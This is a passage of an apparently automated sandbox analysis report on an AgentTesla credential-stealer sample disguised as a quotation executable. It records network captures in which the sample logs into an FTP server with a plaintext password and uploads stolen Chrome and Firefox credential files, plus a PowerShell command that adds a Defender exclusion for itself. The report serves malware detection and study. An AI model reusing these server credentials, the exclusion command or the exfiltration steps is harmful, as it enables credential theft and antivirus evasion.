                                              Nov 4, 2024 09:29:09.090272903 CET4973421192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.095139027 CET2149734192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.095204115 CET4973421192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.098787069 CET4973421192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.104252100 CET2149734192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.104322910 CET4973421192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.133035898 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.137883902 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.137950897 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.702486992 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.702721119 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.707674026 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.859692097 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:09.860779047 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:09.865601063 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.127969980 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.128094912 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.132939100 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.285300016 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.285429955 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.290302038 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.660753012 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.661011934 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.661056042 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.661103964 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.666042089 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.817913055 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.818053007 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.822921991 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.975305080 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.975976944 CET4973931892192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.980910063 CET3189249739192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:10.980967045 CET4973931892192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.981091022 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:10.985897064 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.519942999 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.520200014 CET4973931892192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.520242929 CET4973931892192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.525335073 CET3189249739192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.525352955 CET3189249739192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.525366068 CET3189249739192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.526205063 CET3189249739192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.527688980 CET4973931892192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.569206953 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.676512957 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.676943064 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.681854010 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.834021091 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.837044001 CET4974032771192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.841932058 CET3277149740192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:11.842767954 CET4974032771192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.842813015 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:11.847626925 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:12.406203985 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:12.406462908 CET4974032771192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:12.412647963 CET3277149740192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:12.412731886 CET4974032771192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:12.459814072 CET4973521192.168.2.4192.254.225.136
                                              Nov 4, 2024 09:29:12.562563896 CET2149735192.254.225.136192.168.2.4
                                              Nov 4, 2024 09:29:12.616055012 CET4973521192.168.2.4192.254.225.136

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 4, 2024 09:29:06.051784039 CET6375253192.168.2.41.1.1.1
                                              Nov 4, 2024 09:29:06.058881044 CET53637521.1.1.1192.168.2.4
                                              Nov 4, 2024 09:29:06.962395906 CET5901253192.168.2.41.1.1.1
                                              Nov 4, 2024 09:29:06.969326019 CET53590121.1.1.1192.168.2.4
                                              Nov 4, 2024 09:29:08.672437906 CET5159953192.168.2.41.1.1.1
                                              Nov 4, 2024 09:29:09.088629961 CET53515991.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 4, 2024 09:29:06.051784039 CET192.168.2.41.1.1.10xaf2eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:06.962395906 CET192.168.2.41.1.1.10x2a03Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:08.672437906 CET192.168.2.41.1.1.10xdeccStandard query (0)ftp.ercolina-usa.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 4, 2024 09:29:06.058881044 CET1.1.1.1192.168.2.40xaf2eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:06.058881044 CET1.1.1.1192.168.2.40xaf2eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:06.058881044 CET1.1.1.1192.168.2.40xaf2eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:06.969326019 CET1.1.1.1192.168.2.40x2a03No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                              Nov 4, 2024 09:29:09.088629961 CET1.1.1.1192.168.2.40xdeccNo error (0)ftp.ercolina-usa.comercolina-usa.comCNAME (Canonical name)IN (0x0001)false
                                              Nov 4, 2024 09:29:09.088629961 CET1.1.1.1192.168.2.40xdeccNo error (0)ercolina-usa.com192.254.225.136A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • ip-api.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449732208.95.112.1805868C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 4, 2024 09:29:06.974951029 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Nov 4, 2024 09:29:07.568665981 CET174INHTTP/1.1 200 OK
                                              Date: Mon, 04 Nov 2024 08:29:06 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 5
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 74 72 75 65 0a
                                              Data Ascii: true


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730172.67.74.1524435868C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-04 08:29:06 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-11-04 08:29:06 UTC399INHTTP/1.1 200 OK
                                              Date: Mon, 04 Nov 2024 08:29:06 GMT
                                              Content-Type: text/plain
                                              Content-Length: 14
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8dd33c05cd203168-DFW
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1542&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1878080&cwnd=250&unsent_bytes=0&cid=9daf3dbdef266d31&ts=256&x=0"
                                              2024-11-04 08:29:06 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                              Data Ascii: 173.254.250.69


                                              FTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Nov 4, 2024 09:29:09.702486992 CET2149735192.254.225.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21.220-IPv6 connections are also welcome on this server.
                                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 03:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                              Nov 4, 2024 09:29:09.702721119 CET4973521192.168.2.4192.254.225.136USER admin@ercolina-usa.com
                                              Nov 4, 2024 09:29:09.859692097 CET2149735192.254.225.136192.168.2.4331 User admin@ercolina-usa.com OK. Password required
                                              Nov 4, 2024 09:29:09.860779047 CET4973521192.168.2.4192.254.225.136PASS ,%EVY$JU0=lu
                                              Nov 4, 2024 09:29:10.127969980 CET2149735192.254.225.136192.168.2.4230 OK. Current restricted directory is /
                                              Nov 4, 2024 09:29:10.285300016 CET2149735192.254.225.136192.168.2.4504 Unknown command
                                              Nov 4, 2024 09:29:10.285429955 CET4973521192.168.2.4192.254.225.136PWD
                                              Nov 4, 2024 09:29:10.660753012 CET2149735192.254.225.136192.168.2.4257 "/" is your current location
                                              Nov 4, 2024 09:29:10.661011934 CET2149735192.254.225.136192.168.2.4257 "/" is your current location
                                              Nov 4, 2024 09:29:10.661103964 CET4973521192.168.2.4192.254.225.136TYPE I
                                              Nov 4, 2024 09:29:10.817913055 CET2149735192.254.225.136192.168.2.4200 TYPE is now 8-bit binary
                                              Nov 4, 2024 09:29:10.818053007 CET4973521192.168.2.4192.254.225.136PASV
                                              Nov 4, 2024 09:29:10.975305080 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,124,148)
                                              Nov 4, 2024 09:29:10.981091022 CET4973521192.168.2.4192.254.225.136STOR CO_Chrome_Default.txt_user-849224_2024_11_04_05_58_51.txt
                                              Nov 4, 2024 09:29:11.519942999 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                              Nov 4, 2024 09:29:11.676512957 CET2149735192.254.225.136192.168.2.4226-File successfully transferred
                                              226-File successfully transferred226 0.156 seconds (measured here), 20.99 Kbytes per second
                                              Nov 4, 2024 09:29:11.676943064 CET4973521192.168.2.4192.254.225.136PASV
                                              Nov 4, 2024 09:29:11.834021091 CET2149735192.254.225.136192.168.2.4227 Entering Passive Mode (192,254,225,136,128,3)
                                              Nov 4, 2024 09:29:11.842813015 CET4973521192.168.2.4192.254.225.136STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_11_04_09_27_41.txt
                                              Nov 4, 2024 09:29:12.406203985 CET2149735192.254.225.136192.168.2.4150 Accepted data connection
                                              Nov 4, 2024 09:29:12.562563896 CET2149735192.254.225.136192.168.2.4226 File successfully transferred

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:29:02
                                              Start date:04/11/2024
                                              Path:C:\Users\user\Desktop\QUOTATION#09678.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\QUOTATION#09678.exe"
                                              Imagebase:0x1f3ce260000
                                              File size:2'313'878 bytes
                                              MD5 hash:B415558B19C70C201F8787E507D09B93
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1895673807.000001F3D03FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1896304643.000001F3E0037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:03:29:02
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:03:29:04
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:29:04
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:29:04
                                              Start date:04/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              Imagebase:0x7ff7699e0000
                                              File size:43'008 bytes
                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4171451807.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4171451807.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4168843900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:03:29:04
                                              Start date:04/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                              Imagebase:0x2d0000
                                              File size:43'008 bytes
                                              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:03:29:05
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\WerFault.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 1104 -s 1516
                                              Imagebase:0x7ff6f4ea0000
                                              File size:570'736 bytes
                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:03:29:08
                                              Start date:04/11/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff693ab0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:13.2%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:8
                                                Total number of Limit Nodes:1
                                                execution_graph 14726 7ffd9b880ed1 14728 7ffd9b880edf 14726->14728 14727 7ffd9b880ec7 14728->14727 14729 7ffd9b880f7a FreeConsole 14728->14729 14730 7ffd9b880fae 14729->14730 14722 7ffd9b88267a 14723 7ffd9b882689 VirtualProtect 14722->14723 14725 7ffd9b88276b 14723->14725

                                                Executed Functions

                                                Function 00007FFD9B88E395 Relevance: 3.2, Strings: 1, Instructions: 1974COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: YN_H
                                                • API String ID: 0-2824976327
                                                • Opcode ID: 8b5b10e46167f0b2f24f2e84eb52c958634b9862b70292645aa2048545312017
                                                • Instruction ID: 18f3bae2384a7c7af3ce6aa0e21db3350e2210b0dcf58f57fd700638fff117fd
                                                • Opcode Fuzzy Hash: 8b5b10e46167f0b2f24f2e84eb52c958634b9862b70292645aa2048545312017
                                                • Instruction Fuzzy Hash: 07D28B3060DF494FE369DB28C4A04B5B7E2FF99301B1445BED49AC72A6DE38E946C781
                                                Function 00007FFD9B950050 Relevance: 2.2, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897842808.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b950000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31c1e3287185edea88d65e7b003492a7b02b8bffdca292f908ce4cc46717006b
                                                • Instruction ID: 2e3e10897f60df47dbd326c7f48465920c015fa082e5c2b0a51a2973b07f80ea
                                                • Opcode Fuzzy Hash: 31c1e3287185edea88d65e7b003492a7b02b8bffdca292f908ce4cc46717006b
                                                • Instruction Fuzzy Hash: F2E25D71A1F7C94FDB66CBA888755A47FE0FF56300F0A01FED489CB1A2DA686946C341
                                                Function 00007FFD9B883F90 Relevance: 2.0, Instructions: 2001COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f93e9ebc0b9aad3872d26314adb93b4beb7d6d0fd7663c655ffe779dfb0ac33
                                                • Instruction ID: 3620ab949f78cf3858a4d885d34e6350a54913f9dcbabecafe118f1c60f84723
                                                • Opcode Fuzzy Hash: 8f93e9ebc0b9aad3872d26314adb93b4beb7d6d0fd7663c655ffe779dfb0ac33
                                                • Instruction Fuzzy Hash: CAE27730A0EA4E4FEB69CB2484A15B57BE1FF99300F1541BDD49EC75E2DE38A946C780
                                                Function 00007FFD9B880810 Relevance: 2.0, Strings: 1, Instructions: 713COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1254 7ffd9b880810-7ffd9b88457e 1257 7ffd9b884581-7ffd9b88459f call 7ffd9b884470 1254->1257 1261 7ffd9b8845a1-7ffd9b8845b1 1257->1261 1263 7ffd9b8845d4-7ffd9b8845e3 1261->1263 1264 7ffd9b8845b3-7ffd9b8845c9 call 7ffd9b884470 call 7ffd9b8844c0 1263->1264 1265 7ffd9b8845e5-7ffd9b8845ff call 7ffd9b884470 call 7ffd9b8844c0 1263->1265 1274 7ffd9b884600-7ffd9b884650 1264->1274 1275 7ffd9b8845cb-7ffd9b8845d2 1264->1275 1279 7ffd9b884652-7ffd9b884657 call 7ffd9b8830a8 1274->1279 1280 7ffd9b88465c-7ffd9b884693 1274->1280 1275->1263 1279->1280 1283 7ffd9b88488f-7ffd9b8848f9 1280->1283 1284 7ffd9b884699-7ffd9b8846a4 1280->1284 1315 7ffd9b8848fb-7ffd9b884901 1283->1315 1316 7ffd9b884916-7ffd9b884940 1283->1316 1285 7ffd9b884718-7ffd9b88471d 1284->1285 1286 7ffd9b8846a6-7ffd9b8846b4 1284->1286 1288 7ffd9b884790-7ffd9b88479a 1285->1288 1289 7ffd9b88471f-7ffd9b88472b 1285->1289 1286->1283 1287 7ffd9b8846ba-7ffd9b8846c9 1286->1287 1291 7ffd9b8846fd-7ffd9b884708 1287->1291 1292 7ffd9b8846cb-7ffd9b8846fb 1287->1292 1293 7ffd9b8847bc-7ffd9b8847c4 1288->1293 1294 7ffd9b88479c-7ffd9b8847a9 call 7ffd9b8830c8 1288->1294 1289->1283 1295 7ffd9b884731-7ffd9b884744 1289->1295 1291->1283 1298 7ffd9b88470e-7ffd9b884716 1291->1298 1292->1291 1300 7ffd9b884749-7ffd9b88474c 1292->1300 1299 7ffd9b8847c7-7ffd9b8847d2 1293->1299 1309 7ffd9b8847ae-7ffd9b8847ba 1294->1309 1295->1299 1298->1285 1298->1286 1299->1283 1302 7ffd9b8847d8-7ffd9b8847e8 1299->1302 1305 7ffd9b884762-7ffd9b88476a 1300->1305 1306 7ffd9b88474e-7ffd9b88475e 1300->1306 1302->1283 1307 7ffd9b8847ee-7ffd9b8847fb 1302->1307 1305->1283 1311 7ffd9b884770-7ffd9b88478f 1305->1311 1306->1305 1307->1283 1310 7ffd9b884801-7ffd9b884821 1307->1310 1309->1293 1310->1283 1321 7ffd9b884823-7ffd9b884832 1310->1321 1318 7ffd9b884903-7ffd9b884914 1315->1318 1319 7ffd9b884941-7ffd9b884995 1315->1319 1318->1315 1318->1316 1332 7ffd9b8849a9-7ffd9b8849e1 1319->1332 1333 7ffd9b884997-7ffd9b8849a7 1319->1333 1322 7ffd9b884834-7ffd9b88483f 1321->1322 1323 7ffd9b88487d-7ffd9b88488e 1321->1323 1322->1323 1328 7ffd9b884841-7ffd9b884858 1322->1328 1328->1323 1337 7ffd9b8849e3-7ffd9b8849e9 1332->1337 1338 7ffd9b884a38-7ffd9b884a3f 1332->1338 1333->1332 1333->1333 1337->1338 1339 7ffd9b8849eb-7ffd9b8849ec 1337->1339 1340 7ffd9b884a82-7ffd9b884aab 1338->1340 1341 7ffd9b884a41-7ffd9b884a42 1338->1341 1342 7ffd9b8849ef-7ffd9b8849f2 1339->1342 1343 7ffd9b884a45-7ffd9b884a48 1341->1343 1345 7ffd9b884aac-7ffd9b884ac1 1342->1345 1346 7ffd9b8849f8-7ffd9b884a05 1342->1346 1343->1345 1347 7ffd9b884a4a-7ffd9b884a5b 1343->1347 1356 7ffd9b884ac3-7ffd9b884aca 1345->1356 1357 7ffd9b884acb-7ffd9b884b51 1345->1357 1348 7ffd9b884a31-7ffd9b884a36 1346->1348 1349 7ffd9b884a07-7ffd9b884a2e 1346->1349 1350 7ffd9b884a5d-7ffd9b884a63 1347->1350 1351 7ffd9b884a79-7ffd9b884a80 1347->1351 1348->1338 1348->1342 1349->1348 1350->1345 1355 7ffd9b884a65-7ffd9b884a75 1350->1355 1351->1340 1351->1343 1355->1351 1356->1357
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: 85a05442ed87d0d03b729734defb4339d09a288fd7eb1b5e4357230d28b2c2ec
                                                • Instruction ID: ba7f0d8db29d0015b9d5e6f587b3ffc48b18463acaf0cc0ab5f60f45f70b39ee
                                                • Opcode Fuzzy Hash: 85a05442ed87d0d03b729734defb4339d09a288fd7eb1b5e4357230d28b2c2ec
                                                • Instruction Fuzzy Hash: 42226632A1DE494FE769DB6898A157177D0EF49310B1901BDD4AEC71ABEE38F8438780
                                                Function 00007FFD9B883FA0 Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fish
                                                • API String ID: 0-1064584243
                                                • Opcode ID: a2f51ebb019157b5bb14dae3c3fe04686398fff8ba3bb5497c6c47fc319123cd
                                                • Instruction ID: 1aaac083fc62e53c4f59f3cc1c36e4970a1481dc20e03392e2f4be3f010b918f
                                                • Opcode Fuzzy Hash: a2f51ebb019157b5bb14dae3c3fe04686398fff8ba3bb5497c6c47fc319123cd
                                                • Instruction Fuzzy Hash: 7EE16C32B1EF490FE7689B6C98654B977D1FF99310B0541BFE09AC71E7ED24A9028381
                                                Function 00007FFD9B88BA11 Relevance: 1.4, Instructions: 1365COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
